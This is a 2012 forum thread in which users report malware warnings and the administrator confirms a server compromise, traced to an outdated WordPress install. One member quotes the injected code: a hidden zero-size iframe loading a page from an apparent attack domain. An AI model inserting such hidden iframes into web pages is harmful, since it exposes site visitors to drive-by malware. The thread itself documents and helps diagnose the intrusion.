Getting a malware warning here

Discussion in 'Admin Talk Support & Feedback' started by Mark.B, May 2, 2012.

  1. Mark.B

    Mark.B Guest

    Hmm, got this just now, it's gone now though.
     

    Attached Files:

  2. Mark.B

    Mark.B Guest

    Ok I uploaded that three times because the attachment box gave me a server error for each, but it seems it did upload them and now I cannot remove any of them!
     
  3. GTB

    GTB Regular Member

    Joined:
    Jun 30, 2009
    Messages:
    1,791
    Likes Received:
    270
    I was just going to report this, the forum has been acting very odd the last few hours showing some funny code. Just edited my signature and saw this code displayed, looks like you've been hacked here. If you visit that link, it's an attack malware site. Your getting an embed image.php file added from that site using css to hide it in an iframe.

    Code:
    <iframe src='http://xxx.jilipon.in/images.php?t=37193364' width='0' height='0' style='display:none'></iframe>
    
    At times when saving edited threads, they don't save and you have to refresh the page to see changes you made. There are other times when some weird type code "/nr/nr/", loads of it getting displayed when clicking edit post. It looks like code used in a CGI-BIN Perl script (.pl) file.
     

    Attached Files:

  4. Mark.B

    Mark.B Guest

    Yep that's one of the sites that is being warned about by Chrome. And I've had the weird code errors too.

    Does look like the site has been compromised.
     
  5. GTB

    GTB Regular Member

    Joined:
    Jun 30, 2009
    Messages:
    1,791
    Likes Received:
    270
    I spotted it happening a few hours ago first, but didn't think that much of it until just edited my signature and saw that code added which I never put there. Visited the link in that iframe and it's getting reported by Firefox as an attack site, and looking at when this first started with funny code displayed while editing posts. I'd say you might have been comprised as little as 4-7 hours ago.
     

    Attached Files:

  6. AWS

    AWS Administrator Admin Talk Staff

    Joined:
    Feb 1, 2010
    Messages:
    1,616
    Likes Received:
    692
    Location:
    Joliet, IL U.S.A.
    First Name:
    Bob
    Yep. Had a Wordpress site that I had forgot about running an old version and an exploit in it was used to inject the iframe in all sites on the server. It's all fixed now and that WP site is gone.
     

Share This Page